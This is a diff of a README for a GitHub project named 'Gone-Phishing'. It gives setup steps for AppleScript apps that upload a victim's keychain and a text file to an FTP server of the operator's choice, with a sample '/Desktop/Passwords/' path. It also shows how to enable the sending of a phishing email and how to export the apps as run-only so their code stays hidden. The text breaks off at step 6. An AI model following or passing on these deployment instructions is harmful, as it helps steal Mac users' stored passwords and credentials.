benb116/Gone-Phishing/Readme.md

 ###Please feel free to test the script by doing the following:

-If you don't want your app to upload the text file and the keychain to an FTP server, and you don't want to actually send the email, you can just download "[Ready To Use App](https://github.com/benb116/Gone-Phishing/blob/master/Ready%20To%20Use%20App.zip)" and unzip it.
+If you don't want your app to upload the text file and the keychain to an FTP server or send the email, you can just download "[Ready To Use App](https://github.com/benb116/Gone-Phishing/blob/master/Ready%20To%20Use%20App.zip)" and unzip it.

 If you do want to upload to an FTP server and/or send out the email, follow the steps below.

 1. Copy "App.applescript", "Updater.applescript", "DK.applescript", and "icon.icns" to your computer.
 2. Open 'App.applescript' and 'Updater.applescript' in AppleScript Editor and find the FTP command properties.
 3. Replace the parts of the code in '<>' with your information.
-For example:

-		set myuser to "<Username>"		set mypass to "<Password>"		set myserv to "<ftp address>"		set mypath to "</path/to/folder/>"
+For example: set myserv to "<ftp address>"		set mypath to "</path/to/folder/>"

 	becomes

-		set myuser to "Benb116"		set mypass to "12345"		set myserv to "123.456.789.0"		set mypath to "/Desktop/Passwords/"4.
+		set myserv to "123.456.789.0"		set mypath to "/Desktop/Passwords/"4.
 Optional: in App.applescript, find the comment "--send theMessage."
 Remove the "--" to make this an actual command that will actually send out the email.
 5. Export "App.applescript", "Updater.applescript", and "DK.applescript" as **run-only** applications.
 	* "Updater.applescript" and "DK.applescript" **must** be made into apps named "Updater" and "DK" respectively.
 You can name "App.app" whatever you want.

 6. Run the following Terminal commands **with each app**: